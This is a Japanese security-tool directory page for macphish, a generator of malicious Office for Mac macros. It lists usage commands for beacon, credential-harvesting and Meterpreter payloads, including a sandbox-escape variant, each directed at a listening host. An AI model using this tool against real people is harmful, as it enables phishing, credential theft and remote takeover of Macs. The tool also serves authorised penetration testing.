Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
macphish — macOS上でのフィッシングおよびエクスプロイトテスト用に、ビーコン、認証情報収集、meterpreterペイロードを含む悪質なOffice for Macマクロを生成します。 | Kitploit
ツール/GitHubGitHub/cldrn/macphish
ペイロード生成エクスプロイトフィッシング
GitHubcldrn/macphish

macphish

macOS上でのフィッシングおよびエクスプロイトテスト用に、ビーコン、認証情報収集、meterpreterペイロードを含む悪質なOffice for Macマクロを生成します。

リポジトリを見る
24550941年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

macphish

Office for Mac Macro Payload Generator macphish

攻撃ベクトル

利用可能な攻撃ベクトルは4つです:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

'creds'メソッドの場合、macphishはApplescriptスクリプトを直接生成できます。シェルから実行する必要がある場合に便利です。

beacon

実行時、このペイロードはリスニングホストに信号を送り、被害者に関する基本的なシステム情報を提供します。ビーコンペイロードを生成する最も簡単な方法は次のとおりです:

$./macphish.py -lh <listening host> 

デフォルトではcurlを使用しますが、コマンドテンプレートを変更することで他のユーティリティ(wget、nslookup)も使用できます。

creds

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

meterpreterペイロードを生成する最も簡単な方法は次のとおりです:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

最初にGrantAccessToMultipleFiles()を呼び出すmeterpreterペイロードを生成するには:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

meterpreter攻撃では、現時点ではPythonペイロードのみがサポートされています。

使用方法

詳細は https://github.com/cldrn/macphish/wiki/Usage を参照してください。

PoCs

  • Word for MacにおけるGrantAccessToMultipleFilesを使用したサンドボックス回避
  • グローバルかつ再帰的な権限の実証 - MacOSのWordにおける悪意のあるマクロ
  • Office For Macにおけるマクロを使用したMeterpreter実行
  • macOSのWordマクロを使用した認証情報収集(フィッシング)
ツールをダウンロード